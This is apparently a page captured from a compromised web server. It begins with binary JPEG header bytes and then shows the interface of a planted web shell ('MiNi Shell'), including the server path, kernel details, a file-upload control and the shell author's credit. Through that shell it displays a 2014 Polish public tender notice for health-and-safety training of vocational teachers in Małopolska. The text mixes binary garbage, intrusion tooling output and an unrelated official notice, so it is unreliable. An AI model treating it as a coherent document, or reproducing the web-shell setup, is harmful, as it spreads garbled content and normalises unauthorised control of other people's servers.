JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140526/111837-N-2014.html

<p class="kh_header"><b>Kraków: Zorganizowanie i przeprowadzenie  szkolenia BHP w przedmiotach zawodowych, w ramach projektu Modernizacja Systemu Doskonalenia Kadr Szkół Zawodowych w Małopolsce. Sprawa znak: MSD- ZP/271/11/2014</b><br>
<b>Numer ogłoszenia: 111837 - 2014; data zamieszczenia: 26.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolskie Centrum Doskonalenia Nauczycieli , ul. Lubelska 23, 30-003 Kraków, woj. małopolskie, tel. 12 623-76-56, 623 76 46, faks 12 623 77 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mcdn.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie  szkolenia BHP w przedmiotach zawodowych, w ramach projektu Modernizacja Systemu Doskonalenia Kadr Szkół Zawodowych w Małopolsce. Sprawa znak: MSD- ZP/271/11/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zorganizowanie i przeprowadzenie  szkolenia BHP w przedmiotach zawodowych, w ramach projektu Modernizacja Systemu Doskonalenia Kadr Szkół Zawodowych w Małopolsce.
2.Zamówienie publiczne udzielane jest zgodnie z ustawą z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych w trybie przetargu nieograniczonego.
3. Opis przedmiotu zamówienia
3.1. Przedmiotem zamówienia zorganizowanie i przeprowadzenie  szkolenia BHP w przedmiotach zawodowych, w ramach projektu Modernizacja Systemu Doskonalenia Kadr Szkół Zawodowych w Małopolsce. 
3.2.Celem szkolenia jest:
a/	dostarczenie uczestnikom umiejętności w zakresie prawidłowej organizacji i wyposażenia nowoczesnych stanowisk pracy, uwzględniających najnowsze wymagania ergonomii, bhp, ochrony p-poż, p-poraż. i środowiska 
b/	przygotowanie uczestników szkolenia  do kształcenia u ucznia  podczas wykonywania zadań zawodowych nawyku używania środków i przedmiotów produkcji (maszyn   i urządzeń) zgodnie z normami technicznymi oraz wymaganiami  ochron indywidualnych i zbiorowych a także  doborem rodzaju  środków ochrony indywidualnej  i  zbiorowej dla poszczególnych zawodów i specjalności (elektryczna, elektromechanicznych,  mechaniczna, samochodowa, ogólnobudowlana)
3.3 Szkolenie dla każdej grupy powinien obejmować 40 godzin dydaktycznych, z tego 10 [h] to godziny zajęć teoretycznych, a 30 [h] to godziny zajęć praktycznych wraz z egzaminem. 
3.4.Program szkolenia musi obejmować następujące bloki tematyczne:
I. Pojęcia związane z bezpieczeństwem i higieną pracy,  ochroną przeciwpożarową, ochroną  środowiska i ergonomią -    2[h]
II. Zadania i uprawnienia instytucji oraz służb działających w zakresie ochrony pracy i  ochrony środowiska w Polsce - 2[h]
III. Prawa i obowiązki pracownika oraz pracodawcy w zakresie bhp. - 4[h]
IV. Zagrożenia dla zdrowia i życia człowieka oraz mienia i środowiska związane z       wykonywaniem zadań zawodowych - 4[h]
V. Zagrożenia związane z występowaniem szkodliwych czynników w środowisku pracy - 4[h]
VI. Skutki oddziaływania czynników szkodliwych na organizm człowieka - 4[h]
VII. Stanowisko pracy zgodnie z obowiązującymi wymaganiami ergonomii, przepisami bhp,  ochrony przeciwpożarowej i ochrony środowiska - 4[h]
VIII. Środki ochrony indywidualnej i zbiorowej podczas wykonywania zadań zawodowych -  4[h]
IX. Zasady bhp oraz przepisy prawa dotyczące ochrony przeciwpożarowej i ochrony   Środowiska - 2h]
X. Pierwsza pomoc poszkodowanym w wypadkach przy pracy oraz w stanach zagrożenia  zdrowia i życia - 4[h]
XI. BHP w zawodach: mechanicznych, elektrycznych, elektromechanicznych,  samochodowych i ogólnobudowlanych - 6[h]
3.5. Etap I  przedmiotu zamówienia-    zorganizowanie i przeprowadzenie  szkolenia BHP w przedmiotach zawodowych, w ramach projektu Modernizacja Systemu Doskonalenia Kadr Szkół Zawodowych w Małopolsce.    
3.6. Zakres przedmiotu zamówienia w zakresie etapu I obejmuje:
a/ przeszkolenie 73 (w 3 grupach szkoleniowych: I grupa Nawojowa 29 osób, II grupa Oświęcim 24 osób, III grupa Dobra: 20 osób)  nauczycieli przedmiotów zawodowych szkół zawodowych   w Małopolsce. Szkolenie obejmuje 40 godzin dydaktycznych z tego co najmniej 30 godzin zajęć praktycznych.
b/ przygotowanie szczegółowego programu szkolenia w oparciu o bloki tematyczne o których mowa w pkt. 3.4 specyfikacji.
c/ przygotowanie harmonogramu szkolenia w oparciu o wcześniej przygotowany program szkolenia.
d/ zapewnienie kadry szkoleniowej w ilości min. 3 osób 
e/ prowadzenie dokumentacji szkolenia (łącznie z fotograficzną- min. 10 zdjęć) i przekazanie jej (po zakończeniu szkolenia) do Zamawiającego
f/ opracowanie, powielenie i przekazanie każdemu uczestnikowi kursu niezbędnych materiałów szkoleniowych, takich jak: skrypt, zestawy pytań wraz z odpowiedziami, które wchodzą w skład testu końcowego
g/ zapewnienie uczestnikom poczęstunku w postaci kawy, herbaty, ciasteczek itp.
3.7. Wykonawca winien podczas szkolenia dla każdej grupy oddzielnie:
a/zabezpieczyć pełny zestaw materiałów  do szkolenia, w tym: skrypt zawierający skrócone treści objęte programem szkolenia, przykłady testów egzaminacyjnych, przykłady ćwiczeń problemowych z zakresu określonego ryzyka zawodowego dla poszczególnych branż zawodowych, zestaw materiałów audio-wizualnych, fantom - cała postać z kontrolerem monitorującym rytm i głębokość ucisku przy wykonywaniu masażu serca oraz wentylacji, apteczka I pomocy, aparaty powietrzne.
b/zapewnić każdemu uczestnikowi zestawu materiałów szkoleniowo-ćwiczeniowych obejmującego: 
-skrypt zawierający skrócone treści objęte programem szkolenia, 
-przykłady testów egzaminacyjnych, przykłady ćwiczeń problemowych z zakresu określonego ryzyka zawodowego dla poszczególnych branż zawodowych 
-	zestaw filmów instruktażowych i dydaktycznych z zakresu bhp, p-poż, p-poraż. (1kpl. = 10filmów) umożliwiający realizację całości programu szkoleniowego.
Powyższe zestawy pozostaną w dyspozycji uczestników po zakończeniu kursu, których odbiór zostanie potwierdzony stosownym protokołem.
c/         zapewnić na czas realizacji kursu dla każdej grupy szkoleniowej materiały szkoleniowo- ćwiczeniowe do przeprowadzenia szkolenia takie jak:
- apteczka pierwszej pomocy z wyposażeniem wg. DIN 13157.
- fantom cała postać z kontrolerem monitorującym rytm i głębokość ucisku przy wykonywaniu masażu serca oraz wentylacji do ćwiczeń z zakresu udzielania pierwszej pomocy przedlekarskiej dostarczony z torbą transportową i 10 wymiennymi jednorazowymi drogami oddechowymi, spełniający poniższe wymagania:
a) umożliwia naukę resuscytacji krążeniowo -oddechowej, bezprzyrządowego udrażniania dróg oddechowych, stosowania rurek ustno-gardłowych Guedela, manewru Heimlicha, ewakuacji poszkodowanego, układania w pozycji bezpiecznej, unieruchamiania, bandażowania (palce rąk i stóp manekina są rozdzielone).
b) powierzchnia manekina jest gładka i odporna na wodę, olejki i mazidła.
c) posiada wymienne jednorazowe drogi oddechowe - łatwa i szybka wymiana,
zachowanie higieny ćwiczeń i minimalizacja ryzyka przenoszenia zakażeń bez konieczności dezynfekcji
d) w pełni ruchoma głowa, szyja i żuchwa pozwalające na naukę bezprzyrządowego udrażniania dróg oddechowych i ułożenie głowy w tzw. pozycji węszącej
e) Drogi oddechowe są niedrożne, gdy głowa skierowana jest do przodu
f) Łatwo dostępne wnętrze klatki piersiowej z żebrami, płucami i sercem (zwiększony
realizm wykonywania masażu serca i możliwość ćwiczenia manewru Heimlicha)
g) Realistyczne wznoszenie i opadanie klatki piersiowej w czasie wykonywania wentylacji
h) Wyczuwalny puls szyjny i udowy  
i) Zamykające się i otwierające oczy, jedna źrenica jest rozszerzona
j) Ćwiczenia okulistyczne, w tym podawanie leków do oczodołów, włącznie z
podawaniem kropli i maści do worka spojówkowego, usuwanie ciał obcych, przepłukiwanie oka
k) Posiada górne i dolne zęby oraz ruchomy język
l) Możliwość zginania w łokciach, talii, kolanach i kostkach
ł)  Odłączany w pasie w celu ułatwienia przechowywania
3.8. Wykonawca winien zabezpieczyć sale dydaktyczną dla każdej grupy z pełnym wyposażeniem audio-wizualnym o powierzchni minimum 40 m2.
3.9. Etap II przedmiotu zamówienia- przeprowadzenie  egzaminu końcowego składającego się z części teoretycznej i praktycznej, potwierdzonego wydaniem stosownego certyfikatu lub zaświadczenia, którego zakres obejmuje:
a/ przeprowadzenie egzaminu składającego się z części teoretycznej (test) i praktycznej (wykonanie czynności objętych pierwszą pomocą przedlekarską) dla 73 nauczycieli - uczestników szkolenia 
b/ sporządzenie protokołu z egzaminu i przekazanie jego kopii Zamawiającemu.
 c/ wydanie uczestnikom kursu certyfikatu lub zaświadczeń.
3.10.Szczegółowy opis przedmiotu zamówienia oraz sposób realizacji zamówienia zawiera załącznik nr 2 do SIWZ  -wzór umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.40.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia/nie spełnia, w oparciu o oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia/nie spełnia, w oparciu o oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia/nie spełnia, w oparciu o oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż dysponuje kadrą szkoleniową, która będzie uczestniczyć w wykonywaniu zamówienia w postaci minimum 3 osób-trenerów, posiadających następujące kwalifikacje/doświadczenie:

Jedna osoba- trener 
- posiada wykształcenie wyższe techniczne wraz z uprawnieniami pedagogicznymi
- posiada 5 letnie doświadczenie w prowadzeniu szkoleń z zakresu bhp, p-poż, p-poraż, 
-posiada uprawnienia  elektryczne, energetyczne i gazowe( grupa I SEP, grupa II GIGE, grupa III seria ED)

Jedna osoba- trener
- posiada wykształcenie wyższe kierunkowe (zarządzanie bezpieczeństwem pracy i warunkami środowiskowymi)
- posiada 5 letnie doświadczenie w prowadzeniu szkoleń z zakresu  bhp, p-poż, p-poraż,
- posiada certyfikat ukończenia studiów w zakresie BHP oraz tytułu inspektora p-poż
-posiada uprawnienia pedagogiczne 

Jedna osoba - trener
- posiada wykształcenie wyższe wraz z uprawnieniami pedagogicznymi
- posiada 5 letnie doświadczenie w prowadzeniu szkoleń z zakresu bhp, p-poż, p-poraż oraz
   I pomocy przedlekarskiej
-posiada certyfikat Europejskiej Rady Resuscytacji w zakresie zaawansowanych zabiegów resuscytacjyjnych, postępowania w katastrofach (wypadki masowe), 
- posiada ukończony kurs doskonalący dla ratowników medycznych (ITLS, ALS)

Ocena spełnienia warunku będzie dokonywana metoda 0 - 1, tj. spełnia/nie spełnia, w oparciu o  oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 3 do SIWZ, wykaz osób -wzór załącznik nr 5 do SIWZ i oświadczenie wzór załącznik nr 6 do SIWZ dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia/nie spełnia, w oparciu o oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pozostałe wymagane dokumenty:
1.	wypełniony i podpisany przez Wykonawcę lub przez osoby upoważnione do reprezentowania Wykonawcy formularz oferty - według wzoru stanowiącego załącznik nr 1 do specyfikacji, 
2.	pełnomocnictwo (pełnomocnictwa) dołączone w formie oryginału lub notarialnie poświadczonej kopii albo kopii poświadczonej za zgodność z oryginałem przez osoby udzielające pełnomocnictwa, jeśli oferta będzie podpisywana przez pełnomocnika, przy czym dotyczy to również przypadków składania ofert przez podmioty występujące wspólnie, czyli uczestników konsorcjum
3.	podpisana przez Wykonawcę lub przez osoby upoważnione do reprezentowania Wykonawcy lista podmiotów wraz z oświadczeniem należących do tej samej grupy kapitałowej (grupa kapitałowa w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów Dz. U. Nr 50, poz. 331, z pózn. zm.), o której mowa w art. 24 ust. 2 pkt 5 ustawy lub informacja w formie oświadczenia o tym, że wykonawca nie należy do grupy kapitałowej, sporządzona według wzoru stanowiącego załącznik nr 4a lub 4b do specyfikacji,
4.	wypełniony i podpisany przez Wykonawcę lub przez osoby upoważnione do reprezentowania Wykonawcy formularz cenowy - według wzoru stanowiącego załącznik nr 7 do specyfikacji</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w zakresie:
1. zmiany wysokości stawki VAT,
2.  zmian osób, które będą uczestniczyć w wykonywaniu zamówienia.Ewentualna zmiana składu osobowego może nastąpić wyłącznie za zgodą Zamawiającego, o ile Wykonawca zapewni osoby które posiadają nie niższe kwalifikacje i doświadczenie, których wymagał Zamawiający</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mcdn.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Małopolskie Centrum Doskonalenia Nauczycieli,ul. Lubelska 23, 30-003 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2014 godzina 09:30, miejsce: Małopolskie Centrum Doskonalenia Nauczycieli,ul. Lubelska 23, 30-003 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt Modernizacja systemu doskonalenia kadr szkół zawodowych w Małopolsce, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.4 Wysoko wykwalifikowane kadry systemu oświaty.Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com